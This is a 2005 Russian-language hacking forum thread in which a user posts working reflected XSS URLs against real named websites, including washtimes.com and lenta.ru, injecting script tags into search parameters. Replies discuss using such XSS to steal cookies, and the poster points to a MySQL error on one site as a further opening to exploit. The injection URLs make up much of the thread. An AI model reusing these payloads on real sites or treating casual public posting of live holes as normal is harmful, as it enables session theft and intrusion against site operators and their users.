Xss Вашингтон таймс

Discussion in 'Уязвимости' started by Dmitro, 27 Sep 2005.

  1. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    хм... такой крупный сайт, а XSS ... не хорошо ((

    www.washtimes.com
    Например:
    Справа форма поиска "Quick Search" - вводи чё хошь...

    http://www.washtimes.com/archive/index.php?Action=Go&Keywords='%3E%3Cscript%3Ealert()%3C/script%3E

    кстати, вот ещё на лента.ру :
    http://lenta.ru/Search?Search="><script>alert()</script>&x=7&y=7

    и вот:
    http://www.voronezh.ru/cgi-bin/yp.pl?sample="+<script>alert('XSS_BY_YA')</script>+"&x=25&y=3

    и вот:
    http://hosting.vrn.ru/cgi-bin/searc...S_BY_YA')</script>+"&mf=10&nodate=1&x=30&y=12

    и вот:
    http://www.084.vrn.ru/cgi-bin/searc...SS_BY_YA')</script>+"&t=P&A=&T=&il=0&x=25&y=8

    А вообще XSS в поисковике... - это щас модно)))
     
    #1 Dmitro, 27 Sep 2005
    Last edited: 27 Sep 2005
  2. Mastermind

    Mastermind Elder - Старейшина

    Joined:
    21 Jul 2005
    Messages:
    50
    Likes Received:
    4
    Reputations:
    5
    А что собственно могут дать такого рода Xss?
     
  3. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    практически ничего, можно куки украсть.
     
  4. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    Да не скажи... на вашингтон таймс ещё и ошибку мускуля выдало... Тут уж и поработать мона )))
     
  5. Mastermind

    Mastermind Elder - Старейшина

    Joined:
    21 Jul 2005
    Messages:
    50
    Likes Received:
    4
    Reputations:
    5
    k1b0rg, отправив ссылку другу, месяц знакомому с компом?